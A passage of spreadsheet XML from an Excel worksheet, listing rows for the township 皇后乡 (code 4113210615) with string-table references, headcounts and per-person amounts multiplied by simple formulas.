      </c>
      <c r="D1850" s="17" t="s">
        <v>4952</v>
      </c>
      <c r="E1850" s="17" t="s">
        <v>4815</v>
      </c>
      <c r="F1850" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1850" s="17">
        <v>1</v>
      </c>
      <c r="H1850" s="18">
        <v>365</v>
      </c>
      <c r="I1850" s="17">
        <f>H1850*G1850</f>
        <v>365</v>
      </c>
      <c r="J1850" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1850" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1851" customHeight="1" spans="1:11">
      <c r="A1851" s="16" t="s">
        <v>4953</v>
      </c>
      <c r="B1851" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1851" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1851" s="17" t="s">
        <v>4954</v>
      </c>
      <c r="E1851" s="17" t="s">
        <v>4919</v>
      </c>
      <c r="F1851" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1851" s="17">
        <v>2</v>
      </c>
      <c r="H1851" s="18">
        <v>325</v>
      </c>
      <c r="I1851" s="17">
        <f>H1851*G1851</f>
        <v>650</v>
      </c>
      <c r="J1851" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1851" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1852" customHeight="1" spans="1:11">
      <c r="A1852" s="16" t="s">
        <v>4955</v>
      </c>
      <c r="B1852" s="17" t="str">
        <f>B1851</f>
        <v>皇后乡</v>
      </c>
      <c r="C1852" s="17" t="str">
        <f>C1851</f>
        <v>皇后乡</v>
      </c>
      <c r="D1852" s="16" t="s">
        <v>4956</v>
      </c>
      <c r="E1852" s="16" t="s">
        <v>4865</v>
      </c>
      <c r="F1852" s="17" t="str">
        <f>F1851</f>
        <v>4113210615</v>
      </c>
      <c r="G1852" s="17"/>
      <c r="H1852" s="17"/>
      <c r="I1852" s="17"/>
      <c r="J1852" s="17"/>
      <c r="K1852" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1853" customHeight="1" spans="1:11">
      <c r="A1853" s="16" t="s">
        <v>4957</v>
      </c>
      <c r="B1853" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1853" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1853" s="17" t="s">
        <v>4958</v>
      </c>
      <c r="E1853" s="17" t="s">
        <v>4959</v>
      </c>
      <c r="F1853" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1853" s="17">
        <v>1</v>
      </c>
      <c r="H1853" s="18">
        <v>365</v>
      </c>
      <c r="I1853" s="17">
        <f>H1853*G1853</f>
        <v>365</v>
      </c>
      <c r="J1853" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1853" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1854" customHeight="1" spans="1:11">
      <c r="A1854" s="16" t="s">
        <v>4960</v>
      </c>
      <c r="B1854" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1854" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1854" s="17" t="s">
        <v>4961</v>
      </c>
      <c r="E1854" s="17" t="s">
        <v>4962</v>
      </c>
      <c r="F1854" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1854" s="17">
        <v>2</v>
      </c>
      <c r="H1854" s="18">
        <v>325</v>
      </c>
      <c r="I1854" s="17">
        <f>H1854*G1854</f>
        <v>650</v>
      </c>
      <c r="J1854" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1854" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1855" customHeight="1" spans="1:11">
      <c r="A1855" s="16" t="s">
        <v>4963</v>
      </c>
      <c r="B1855" s="17" t="str">
        <f>B1854</f>
        <v>皇后乡</v>
      </c>
      <c r="C1855" s="17" t="str">
        <f>C1854</f>
        <v>皇后乡</v>
      </c>
      <c r="D1855" s="16" t="s">
        <v>4964</v>
      </c>
      <c r="E1855" s="16" t="s">
        <v>4805</v>
      </c>
      <c r="F1855" s="17" t="str">
        <f>F1854</f>
        <v>4113210615</v>
      </c>
      <c r="G1855" s="17"/>
      <c r="H1855" s="17"/>
      <c r="I1855" s="17"/>
      <c r="J1855" s="17"/>
      <c r="K1855" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1856" customHeight="1" spans="1:11">
      <c r="A1856" s="16" t="s">
        <v>4965</v>
      </c>
      <c r="B1856" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1856" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1856" s="17" t="s">
        <v>4966</v>
      </c>
      <c r="E1856" s="17" t="s">
        <v>4743</v>
      </c>
      <c r="F1856" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1856" s="17">
        <v>2</v>
      </c>
      <c r="H1856" s="18">
        <v>325</v>
      </c>
      <c r="I1856" s="17">
        <f>H1856*G1856</f>
        <v>650</v>
      </c>
      <c r="J1856" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1856" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1857" customHeight="1" spans="1:11">
      <c r="A1857" s="16" t="s">
        <v>4967</v>
      </c>
      <c r="B1857" s="17" t="str">
        <f>B1856</f>
        <v>皇后乡</v>
      </c>
      <c r="C1857" s="17" t="str">
        <f>C1856</f>
        <v>皇后乡</v>
      </c>
      <c r="D1857" s="16" t="s">
        <v>4968</v>
      </c>
      <c r="E1857" s="16" t="s">
        <v>4824</v>
      </c>
      <c r="F1857" s="17" t="str">
        <f>F1856</f>
        <v>4113210615</v>
      </c>
      <c r="G1857" s="17"/>
      <c r="H1857" s="17"/>
      <c r="I1857" s="17"/>
      <c r="J1857" s="17"/>
      <c r="K1857" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1858" customHeight="1" spans="1:11">
      <c r="A1858" s="16" t="s">
        <v>4969</v>
      </c>
      <c r="B1858" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1858" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1858" s="17" t="s">
        <v>4970</v>
      </c>
      <c r="E1858" s="17" t="s">
        <v>4880</v>
      </c>
      <c r="F1858" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1858" s="17">
        <v>2</v>
      </c>
      <c r="H1858" s="18">
        <v>325</v>
      </c>
      <c r="I1858" s="17">
        <f>H1858*G1858</f>
        <v>650</v>
      </c>
      <c r="J1858" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1858" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1859" customHeight="1" spans="1:11">
      <c r="A1859" s="16" t="s">
        <v>4971</v>
      </c>
      <c r="B1859" s="17" t="str">
        <f>B1858</f>
        <v>皇后乡</v>
      </c>
      <c r="C1859" s="17" t="str">
        <f>C1858</f>
        <v>皇后乡</v>
      </c>
      <c r="D1859" s="16" t="s">
        <v>4972</v>
      </c>
      <c r="E1859" s="16" t="s">
        <v>4904</v>
      </c>
      <c r="F1859" s="17" t="str">
        <f>F1858</f>
        <v>4113210615</v>
      </c>
      <c r="G1859" s="17"/>
      <c r="H1859" s="17"/>
      <c r="I1859" s="17"/>
      <c r="J1859" s="17"/>
      <c r="K1859" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1860" customHeight="1" spans="1:11">
      <c r="A1860" s="16" t="s">
        <v>4973</v>
      </c>
      <c r="B1860" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1860" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1860" s="17" t="s">
        <v>4974</v>
      </c>
      <c r="E1860" s="17" t="s">
        <v>4751</v>
      </c>
      <c r="F1860" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1860" s="17">
        <v>2</v>
      </c>
      <c r="H1860" s="18">
        <v>325</v>
      </c>
      <c r="I1860" s="17">
        <f>H1860*G1860</f>
        <v>650</v>
      </c>
      <c r="J1860" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1860" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1861" customHeight="1" spans="1:11">
      <c r="A1861" s="16" t="s">
        <v>4975</v>
      </c>
      <c r="B1861" s="17" t="str">
        <f>B1860</f>
        <v>皇后乡</v>
      </c>
      <c r="C1861" s="17" t="str">
        <f>C1860</f>
        <v>皇后乡</v>
      </c>
      <c r="D1861" s="16" t="s">
        <v>1143</v>
      </c>
      <c r="E1861" s="16" t="s">
        <v>4976</v>
      </c>
      <c r="F1861" s="17" t="str">
        <f>F1860</f>
        <v>4113210615</v>
      </c>
      <c r="G1861" s="17"/>
      <c r="H1861" s="17"/>
      <c r="I1861" s="17"/>
      <c r="J1861" s="17"/>
      <c r="K1861" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1862" customHeight="1" spans="1:11">
      <c r="A1862" s="16" t="s">
        <v>4977</v>
      </c>
      <c r="B1862" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1862" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1862" s="17" t="s">
        <v>4978</v>
      </c>
      <c r="E1862" s="17" t="s">
        <v>4855</v>
      </c>
      <c r="F1862" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1862" s="17">
        <v>2</v>
      </c>
      <c r="H1862" s="18">
        <v>325</v>
      </c>
      <c r="I1862" s="17">
        <f>H1862*G1862</f>
        <v>650</v>
      </c>
      <c r="J1862" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1862" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1863" customHeight="1" spans="1:11">
      <c r="A1863" s="16" t="s">
        <v>4979</v>
      </c>
      <c r="B1863" s="17" t="str">
        <f>B1862</f>
        <v>皇后乡</v>
      </c>
      <c r="C1863" s="17" t="str">
        <f>C1862</f>
        <v>皇后乡</v>
      </c>
      <c r="D1863" s="16" t="s">
        <v>4980</v>
      </c>
      <c r="E1863" s="16" t="s">
        <v>4874</v>
      </c>
      <c r="F1863" s="17" t="str">
        <f>F1862</f>
        <v>4113210615</v>
      </c>
      <c r="G1863" s="17"/>
      <c r="H1863" s="17"/>
      <c r="I1863" s="17"/>
      <c r="J1863" s="17"/>
      <c r="K1863" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1864" customHeight="1" spans="1:11">
      <c r="A1864" s="16" t="s">
        <v>4981</v>
      </c>
      <c r="B1864" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1864" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1864" s="17" t="s">
        <v>4982</v>
      </c>
      <c r="E1864" s="17" t="s">
        <v>4736</v>
      </c>
      <c r="F1864" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1864" s="17">
        <v>1</v>
      </c>
      <c r="H1864" s="18">
        <v>365</v>
      </c>
      <c r="I1864" s="17">
        <f>H1864*G1864</f>
        <v>365</v>
      </c>
      <c r="J1864" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1864" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1865" customHeight="1" spans="1:11">
      <c r="A1865" s="16" t="s">
        <v>4983</v>
      </c>
      <c r="B1865" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1865" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1865" s="17" t="s">
        <v>4884</v>
      </c>
      <c r="E1865" s="17" t="s">
        <v>4757</v>
      </c>
      <c r="F1865" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1865" s="17">
        <v>1</v>
      </c>
      <c r="H1865" s="18">
        <v>365</v>
      </c>
      <c r="I1865" s="17">
        <f>H1865*G1865</f>
        <v>365</v>
      </c>
      <c r="J1865" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1865" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1866" customHeight="1" spans="1:11">
      <c r="A1866" s="16" t="s">
        <v>4984</v>
      </c>
      <c r="B1866" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1866" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1866" s="17" t="s">
        <v>4985</v>
      </c>
      <c r="E1866" s="17" t="s">
        <v>4986</v>
      </c>
      <c r="F1866" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1866" s="17">
        <v>1</v>
      </c>
      <c r="H1866" s="18">
        <v>365</v>
      </c>
      <c r="I1866" s="17">
        <f>H1866*G1866</f>
        <v>365</v>
      </c>
      <c r="J1866" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1866" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1867" customHeight="1" spans="1:11">
      <c r="A1867" s="16" t="s">
        <v>4987</v>
      </c>
      <c r="B1867" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1867" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1867" s="17" t="s">
        <v>4988</v>
      </c>
      <c r="E1867" s="17" t="s">
        <v>4989</v>
      </c>
      <c r="F1867" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1867" s="17">
        <v>2</v>
      </c>
      <c r="H1867" s="18">
        <v>325</v>
      </c>
      <c r="I1867" s="17">
        <f>H1867*G1867</f>
        <v>650</v>
      </c>
      <c r="J1867" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1867" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1868" customHeight="1" spans="1:11">
      <c r="A1868" s="16" t="s">
        <v>4990</v>
      </c>
      <c r="B1868" s="17" t="str">
        <f>B1867</f>
        <v>皇后乡</v>
      </c>
      <c r="C1868" s="17" t="str">
        <f>C1867</f>
        <v>皇后乡</v>
      </c>
      <c r="D1868" s="16" t="s">
        <v>4991</v>
      </c>
      <c r="E1868" s="16" t="s">
        <v>2201</v>
      </c>
      <c r="F1868" s="17" t="str">
        <f>F1867</f>
        <v>4113210615</v>
      </c>
      <c r="G1868" s="17"/>
      <c r="H1868" s="17"/>
      <c r="I1868" s="17"/>
      <c r="J1868" s="17"/>
      <c r="K1868" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1869" customHeight="1" spans="1:11">
      <c r="A1869" s="16" t="s">
        <v>4992</v>
      </c>
      <c r="B1869" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1869" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1869" s="17" t="s">
        <v>4993</v>
      </c>
      <c r="E1869" s="17" t="s">
        <v>4994</v>
      </c>
      <c r="F1869" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1869" s="17">
        <v>2</v>
      </c>
      <c r="H1869" s="18">
        <v>325</v>
      </c>
      <c r="I1869" s="17">
        <f>H1869*G1869</f>
        <v>650</v>
      </c>
      <c r="J1869" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1869" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1870" customHeight="1" spans="1:11">
      <c r="A1870" s="16" t="s">
        <v>4995</v>
      </c>
      <c r="B1870" s="17" t="str">
        <f>B1869</f>
        <v>皇后乡</v>
      </c>
      <c r="C1870" s="17" t="str">
        <f>C1869</f>
        <v>皇后乡</v>
      </c>
      <c r="D1870" s="16" t="s">
        <v>4996</v>
      </c>
      <c r="E1870" s="16" t="s">
        <v>4997</v>
      </c>
      <c r="F1870" s="17" t="str">
        <f>F1869</f>
        <v>4113210615</v>
      </c>
      <c r="G1870" s="17"/>
      <c r="H1870" s="17"/>
      <c r="I1870" s="17"/>
      <c r="J1870" s="17"/>
      <c r="K1870" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1871" customHeight="1" spans="1:11">
      <c r="A1871" s="16" t="s">
        <v>4998</v>
      </c>
      <c r="B1871" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1871" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1871" s="17" t="s">
        <v>4999</v>
      </c>
      <c r="E1871" s="17" t="s">
        <v>5000</v>
      </c>
      <c r="F1871" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1871" s="17">
        <v>2</v>
      </c>
      <c r="H1871" s="18">
        <v>325</v>
      </c>
      <c r="I1871" s="17">
        <f>H1871*G1871</f>
        <v>650</v>
      </c>
      <c r="J1871" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1871" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1872" customHeight="1" spans="1:11">
      <c r="A1872" s="16" t="s">
        <v>5001</v>
      </c>
      <c r="B1872" s="17" t="str">
        <f>B1871</f>
        <v>皇后乡</v>
      </c>
      <c r="C1872" s="17" t="str">
        <f>C1871</f>
        <v>皇后乡</v>
      </c>
      <c r="D1872" s="16" t="s">
        <v>5002</v>
      </c>
      <c r="E1872" s="16" t="s">
        <v>5003</v>
      </c>
      <c r="F1872" s="17" t="str">
        <f>F1871</f>
        <v>4113210615</v>
      </c>
      <c r="G1872" s="17"/>
      <c r="H1872" s="17"/>
      <c r="I1872" s="17"/>
      <c r="J1872" s="17"/>
      <c r="K1872" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1873" customHeight="1" spans="1:11">
      <c r="A1873" s="16" t="s">
        <v>5004</v>
      </c>
      <c r="B1873" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1873" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1873" s="17" t="s">
        <v>5005</v>
      </c>
      <c r="E1873" s="17" t="s">
        <v>5006</v>
      </c>
      <c r="F1873" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1873" s="17">
        <v>2</v>
      </c>
      <c r="H1873" s="18">
        <v>325</v>
      </c>
      <c r="I1873" s="17">
        <f>H1873*G1873</f>
        <v>650</v>
      </c>
      <c r="J1873" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1873" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1874" customHeight="1" spans="1:11">
      <c r="A1874" s="16" t="s">
        <v>5007</v>
      </c>
      <c r="B1874" s="17" t="str">
        <f>B1873</f>
        <v>皇后乡</v>
      </c>
      <c r="C1874" s="17" t="str">
        <f>C1873</f>
        <v>皇后乡</v>
      </c>
      <c r="D1874" s="16" t="s">
        <v>5008</v>
      </c>
      <c r="E1874" s="16" t="s">
        <v>4899</v>
      </c>
      <c r="F1874" s="17" t="str">
        <f>F1873</f>
        <v>4113210615</v>
      </c>
      <c r="G1874" s="17"/>
      <c r="H1874" s="17"/>
      <c r="I1874" s="17"/>
      <c r="J1874" s="17"/>
      <c r="K1874" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1875" customHeight="1" spans="1:11">
      <c r="A1875" s="16" t="s">
        <v>5009</v>
      </c>
      <c r="B1875" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1875" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1875" s="17" t="s">
        <v>5010</v>
      </c>
      <c r="E1875" s="17" t="s">
        <v>4824</v>
      </c>
      <c r="F1875" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1875" s="17">
        <v>1</v>
      </c>
      <c r="H1875" s="18">
        <v>365</v>
      </c>
      <c r="I1875" s="17">
        <f>H1875*G1875</f>
        <v>365</v>
      </c>
      <c r="J1875" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1875" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1876" customHeight="1" spans="1:11">
      <c r="A1876" s="16" t="s">
        <v>5011</v>
      </c>
      <c r="B1876" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1876" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1876" s="17" t="s">
        <v>5012</v>
      </c>
      <c r="E1876" s="17" t="s">
        <v>2201</v>
      </c>
      <c r="F1876" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1876" s="17">
        <v>2</v>
      </c>
      <c r="H1876" s="18">
        <v>325</v>
      </c>
      <c r="I1876" s="17">
        <f>H1876*G1876</f>
        <v>650</v>
      </c>
      <c r="J1876" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1876" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1877" customHeight="1" spans="1:11">
      <c r="A1877" s="16" t="s">
        <v>5013</v>
      </c>
      <c r="B1877" s="17" t="str">
        <f>B1876</f>
        <v>皇后乡</v>
      </c>
      <c r="C1877" s="17" t="str">
        <f>C1876</f>
        <v>皇后乡</v>
      </c>
      <c r="D1877" s="16" t="s">
        <v>5014</v>
      </c>
      <c r="E1877" s="16" t="s">
        <v>4904</v>
      </c>
      <c r="F1877" s="17" t="str">
        <f>F1876</f>
        <v>4113210615</v>
      </c>
      <c r="G1877" s="17"/>
      <c r="H1877" s="17"/>
      <c r="I1877" s="17"/>
      <c r="J1877" s="17"/>
      <c r="K1877" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1878" customHeight="1" spans="1:11">
      <c r="A1878" s="16" t="s">
        <v>5015</v>
      </c>
      <c r="B1878" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1878" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1878" s="17" t="s">
        <v>5016</v>
      </c>
      <c r="E1878" s="17" t="s">
        <v>5017</v>
      </c>
      <c r="F1878" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1878" s="17">
        <v>2</v>
      </c>
      <c r="H1878" s="18">
        <v>325</v>
      </c>
      <c r="I1878" s="17">
        <f>H1878*G1878</f>
        <v>650</v>
      </c>
      <c r="J1878" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1878" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1879" customHeight="1" spans="1:11">
      <c r="A1879" s="16" t="s">
        <v>5018</v>
      </c>
      <c r="B1879" s="17" t="str">
        <f>B1878</f>
        <v>皇后乡</v>
      </c>
      <c r="C1879" s="17" t="str">
        <f>C1878</f>
        <v>皇后乡</v>
      </c>
      <c r="D1879" s="16" t="s">
        <v>5019</v>
      </c>
      <c r="E1879" s="16" t="s">
        <v>5020</v>
      </c>
      <c r="F1879" s="17" t="str">
        <f>F1878</f>
        <v>4113210615</v>
      </c>
      <c r="G1879" s="17"/>
      <c r="H1879" s="17"/>
      <c r="I1879" s="17"/>
      <c r="J1879" s="17"/>
      <c r="K1879" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1880" customHeight="1" spans="1:11">
      <c r="A1880" s="16" t="s">
        <v>5021</v>
      </c>
      <c r="B1880" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1880" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1880" s="17" t="s">
        <v>5022</v>
      </c>
      <c r="E1880" s="17" t="s">
        <v>4765</v>
      </c>
      <c r="F1880" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1880" s="17">
        <v>2</v>
      </c>
      <c r="H1880" s="18">
        <v>325</v>
      </c>
      <c r="I1880" s="17">
        <f>H1880*G1880</f>
        <v>650</v>
      </c>
      <c r="J1880" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1880" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1881" customHeight="1" spans="1:11">
      <c r="A1881" s="16" t="s">
        <v>5023</v>
      </c>
      <c r="B1881" s="17" t="str">
        <f>B1880</f>
        <v>皇后乡</v>
      </c>
      <c r="C1881" s="17" t="str">
        <f>C1880</f>
        <v>皇后乡</v>
      </c>
      <c r="D1881" s="16" t="s">
        <v>5024</v>
      </c>
      <c r="E1881" s="16" t="s">
        <v>3852</v>
      </c>
      <c r="F1881" s="17" t="str">
        <f>F1880</f>
        <v>4113210615</v>
      </c>
      <c r="G1881" s="17"/>
      <c r="H1881" s="17"/>
      <c r="I1881" s="17"/>
      <c r="J1881" s="17"/>
      <c r="K1881" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1882" customHeight="1" spans="1:11">
      <c r="A1882" s="16" t="s">
        <v>5025</v>
      </c>
      <c r="B1882" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1882" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1882" s="17" t="s">
        <v>5026</v>
      </c>
      <c r="E1882" s="17" t="s">
        <v>5027</v>
      </c>
      <c r="F1882" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1882" s="17">
        <v>2</v>
      </c>
      <c r="H1882" s="18">
        <v>325</v>
      </c>
      <c r="I1882" s="17">
        <f>H1882*G1882</f>
        <v>650</v>
      </c>
      <c r="J1882" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1882" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1883" customHeight="1" spans="1:11">
      <c r="A1883" s="16" t="s">
        <v>5028</v>
      </c>
      <c r="B1883" s="17" t="str">
        <f>B1882</f>
        <v>皇后乡</v>
      </c>
      <c r="C1883" s="17" t="str">
        <f>C1882</f>
        <v>皇后乡</v>
      </c>
      <c r="D1883" s="16" t="s">
        <v>5029</v>
      </c>
      <c r="E1883" s="16" t="s">
        <v>4914</v>
      </c>
      <c r="F1883" s="17" t="str">
        <f>F1882</f>
        <v>4113210615</v>
      </c>
      <c r="G1883" s="17"/>
      <c r="H1883" s="17"/>
      <c r="I1883" s="17"/>
      <c r="J1883" s="17"/>
      <c r="K1883" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1884" customHeight="1" spans="1:11">
      <c r="A1884" s="16" t="s">
        <v>5030</v>
      </c>
      <c r="B1884" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1884" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1884" s="17" t="s">
        <v>5031</v>
      </c>
      <c r="E1884" s="17" t="s">
        <v>4852</v>
      </c>
      <c r="F1884" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1884" s="17">
        <v>2</v>
      </c>
      <c r="H1884" s="18">
        <v>325</v>
      </c>
      <c r="I1884" s="17">
        <f>H1884*G1884</f>
        <v>650</v>
      </c>
      <c r="J1884" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1884" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1885" customHeight="1" spans="1:11">
      <c r="A1885" s="16" t="s">
        <v>5032</v>
      </c>
      <c r="B1885" s="17" t="str">
        <f>B1884</f>
        <v>皇后乡</v>
      </c>
      <c r="C1885" s="17" t="str">
        <f>C1884</f>
        <v>皇后乡</v>
      </c>
      <c r="D1885" s="16" t="s">
        <v>5033</v>
      </c>
      <c r="E1885" s="16" t="s">
        <v>4997</v>
      </c>
      <c r="F1885" s="17" t="str">
        <f>F1884</f>
        <v>4113210615</v>
      </c>
      <c r="G1885" s="17"/>
      <c r="H1885" s="17"/>
      <c r="I1885" s="17"/>
      <c r="J1885" s="17"/>
      <c r="K1885" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1886" customHeight="1" spans="1:11">
      <c r="A1886" s="16" t="s">
        <v>5034</v>
      </c>
      <c r="B1886" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1886" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1886" s="17" t="s">
        <v>5035</v>
      </c>
      <c r="E1886" s="17" t="s">
        <v>5027</v>
      </c>
      <c r="F1886" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1886" s="17">
        <v>2</v>
      </c>
      <c r="H1886" s="18">
        <v>325</v>
      </c>
      <c r="I1886" s="17">
        <f>H1886*G1886</f>
        <v>650</v>
      </c>
      <c r="J1886" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1886" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1887" customHeight="1" spans="1:11">
      <c r="A1887" s="16" t="s">
        <v>5036</v>
      </c>
      <c r="B1887" s="17" t="str">
        <f>B1886</f>
        <v>皇后乡</v>
      </c>
      <c r="C1887" s="17" t="str">
        <f>C1886</f>
        <v>皇后乡</v>
      </c>
      <c r="D1887" s="16" t="s">
        <v>5037</v>
      </c>
      <c r="E1887" s="16" t="s">
        <v>3664</v>
      </c>
      <c r="F1887" s="17" t="str">
        <f>F1886</f>
        <v>4113210615</v>
      </c>
      <c r="G1887" s="17"/>
      <c r="H1887" s="17"/>
      <c r="I1887" s="17"/>
      <c r="J1887" s="17"/>
      <c r="K1887" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1888" customHeight="1" spans="1:11">
      <c r="A1888" s="16" t="s">
        <v>5038</v>
      </c>
      <c r="B1888" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="C1888" s="17" t="s">
        <v>4734</v>
      </c>
      <c r="D1888" s="17" t="s">
        <v>5039</v>
      </c>
      <c r="E1888" s="17" t="s">
        <v>5027</v>
      </c>
      <c r="F1888" s="17" t="s">
        <v>4737</v>
      </c>
      <c r="G1888" s="17">
        <v>2</v>
      </c>
      <c r="H1888" s="18">
        <v>325</v>
      </c>
      <c r="I1888" s="17">
        <f>H1888*G1888</f>
        <v>650</v>
      </c>
      <c r="J1888" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K1888" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1889" customHeight="1" spans="1:11">
      <c r="A1889" s="16" t="s">
        <v>5040</v>
      </c>
      <c r="B1889" s="17" t="str">
        <f>B1888</f>
        <v>皇后乡</v>
      </c>
      <c r="C1889" s="17" t="str">
        <f>C1888</f>
        <v>皇后乡</v>
      </c>
      <c r="D1889" s="16" t="s">
        <v>5041</v>
      </c>
      <c r="E1889" s="16" t="s">
        <v>5042</v>
      </c>
      <c r="F1889" s="17" t="str">
        <f>F1888</f>
        <v>4113210615</v>
      </c>
      <c r="G1889" s="17"/>
      <c r="H1889" s="17"/>
      <c r="I1889" s="17"/>
      <c r="J1889" s="17"/>
      <c r="K1889" s="17" t="s">
        <v>225</v>
      </c>
